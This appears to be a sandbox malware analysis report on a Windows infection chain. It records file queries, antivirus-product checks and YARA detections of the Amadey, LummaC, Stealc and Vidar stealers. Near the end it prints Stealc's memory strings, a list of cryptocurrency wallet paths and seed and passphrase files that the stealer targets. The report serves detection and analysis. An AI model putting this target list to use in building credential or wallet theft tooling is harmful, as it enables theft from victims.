Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F27980 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

6_2_00F27980

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F27850 GetProcessHeap,HeapAlloc,GetUserNameA,

6_2_00F27850

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F27A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

6_2_00F27A30

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Code function: 9_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

9_2_00406805

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: new_v8.exe, 0000001B.00000003.3358715254.000000000123C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: new_v8.exe, 0000001B.00000003.3026883187.000000000123C000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3197330580.000000000128C000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3426441376.000000000128C000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3234339463.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420299008.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3226982086.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420863597.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3269711303.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3419949484.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3574767608.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3571302943.00000000015CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.axplong.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1758351370.0000000000841000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688467424.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2317904787.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1718075607.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729894674.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c1a4d3220c.exe PID: 6604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GOLD1234.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shop.exe PID: 3888, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 6.2.stealc_default2.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.stealc_default2.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.f6f4816752.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2360564124.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2360588213.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3149193410.00000000002F1000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.3036164555.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: f6f4816752.exe PID: 5472, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 6660, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: Electrum
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: \Electrum\wallets\
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: window-state.json
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: exodus.conf.json
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: \Exodus\
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: info.seco
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: ElectrumLTC
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: passphrase.json
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session 